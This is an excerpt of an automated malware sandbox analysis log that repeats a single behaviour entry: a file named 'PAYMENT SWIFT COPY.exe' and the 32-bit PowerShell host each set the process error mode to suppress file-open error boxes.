                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
